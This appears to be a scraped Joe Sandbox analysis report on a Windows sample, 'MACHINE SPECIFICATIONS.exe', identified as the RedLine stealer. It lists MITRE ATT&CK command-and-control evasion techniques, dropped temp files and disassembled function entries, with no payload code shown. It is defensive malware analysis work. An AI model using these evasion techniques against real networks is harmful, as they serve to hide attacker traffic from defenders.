Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MACHINE SPECIFICATIONS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MACHINE SPECIFICATIONS.exe.log

C:\Users\user\AppData\Local\Temp\tmp133B.tmp

C:\Users\user\AppData\Local\Temp\tmp3E83.tmp

C:\Users\user\AppData\Local\Temp\tmp4163.tmp

C:\Users\user\AppData\Local\Temp\tmp447D.tmp

C:\Users\user\AppData\Local\Temp\tmp49BD.tmp

C:\Users\user\AppData\Local\Temp\tmp570.tmp

C:\Users\user\AppData\Local\Temp\tmp57EA.tmp

C:\Users\user\AppData\Local\Temp\tmp7E99.tmp

C:\Users\user\AppData\Local\Temp\tmp81A6.tmp

C:\Users\user\AppData\Local\Temp\tmp8272.tmp

C:\Users\user\AppData\Local\Temp\tmp989B.tmp

C:\Users\user\AppData\Local\Temp\tmpA773.tmp

C:\Users\user\AppData\Local\Temp\tmpAC7D.tmp

C:\Users\user\AppData\Local\Temp\tmpAD49.tmp

C:\Users\user\AppData\Local\Temp\tmpAE15.tmp

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Function 00F70498 Relevance: 4.3, Strings: 3, Instructions: 542
COMMON

Function 00F77180 Relevance: 2.8, Strings: 2, Instructions: 262
COMMON

Function 00F7D6A8 Relevance: .4, Instructions: 408
COMMON

Function 00F7959B Relevance: .3, Instructions: 300
COMMON

Function 00F795A8 Relevance: .3, Instructions: 264
COMMON

Function 00F70BDC Relevance: 1.6, APIs: 1, Instructions: 103
libraryCOMMON

Function 00F70158 Relevance: 1.6, APIs: 1, Instructions: 99
libraryCOMMON

Function 00F70F50 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre